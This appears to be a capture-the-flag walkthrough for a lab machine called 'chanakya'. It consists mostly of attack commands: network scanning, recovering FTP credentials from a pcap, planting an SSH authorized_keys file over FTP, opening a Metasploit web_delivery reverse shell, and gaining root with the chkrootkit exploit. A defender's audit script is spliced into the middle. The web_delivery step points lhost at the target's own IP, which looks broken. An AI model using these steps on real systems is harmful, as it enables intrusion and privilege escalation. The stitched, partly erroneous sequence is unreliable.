chanakya
1. Information gathering
nmap -sP 192.168.14.0/24
nmap -sV -p- 192.168.14.186
dirb http://192.168.14.186 -X ".txt,.php"
wget http://192.168.14.186/abuse.txt
<?php
echo str_rot13("nfubxn.cpncat");
?>
wget http://192.168.14.186/ashoka.pcapng
ashoka;kautilya
ftp 192.168.14.186
2. Exploitation
ssh-keygen
cd /root/.ssh
mv id_rsa.pub authorized_keys
lcd /root/.ssh
mkdir .ssh
cd .ssh
put authorized_keys
ssh ashoka@192.168.14.186
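A defender-side check for the step above, as an added example that is not part of the original notes: it flags authorized_keys files under a home root that are owned by another account, are group- or world-writable, or were modified recently. The function name, the home-root argument and the day window are assumptions of this sketch.

```shell
#!/bin/sh
# Added example: audit per-user authorized_keys files under a home root.
# audit_authorized_keys, HOME_ROOT and DAYS are names chosen for this sketch.

audit_authorized_keys() {
    home_root=$1
    days=${2:-7}            # report key files changed within this many days
    for home in "$home_root"/*/; do
        home=${home%/}
        [ -d "$home" ] || continue
        sshdir=$home/.ssh
        ak=$sshdir/authorized_keys
        [ -f "$ak" ] || continue

        # Owner of the home directory (name, or uid if it has no name).
        home_owner=$(ls -ld "$home" | awk '{print $3}')

        # 1. Key file owned by someone other than the account owner.
        if [ -n "$(find "$ak" ! -user "$home_owner" 2>/dev/null)" ]; then
            printf 'FINDING\t%s\towner-mismatch\n' "$ak"
        fi
        # 2. Group- or world-writable .ssh directory or key file.
        for p in "$sshdir" "$ak"; do
            if [ -n "$(find "$p" -prune \( -perm -020 -o -perm -002 \))" ]; then
                printf 'FINDING\t%s\tgroup-or-world-writable\n' "$p"
            fi
        done
        # 3. Key file modified recently: compare against change records.
        if [ -n "$(find "$ak" -mtime -"$days")" ]; then
            printf 'FINDING\t%s\tmodified-within-%sd\n' "$ak" "$days"
        fi
    done
}
```

Run it as `audit_authorized_keys /home 7` on a host where FTP users can write to their own home directories; each output line is tab-separated as FINDING, path, reason.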
3. Privilege escalation
First, use the reverse-shell module to give us a meterpreter session on the target machine.
search web_de
use exploit/multi/script/web_delivery
set lhost 192.168.14.186
set lport 3333
set uripath /
exploit (generate)
Next, use a privilege-escalation module; the chkrootkit module successfully escalates to root.
back
search chkrootkit
use exploit/unix/local/chkrootkit
set session 1
run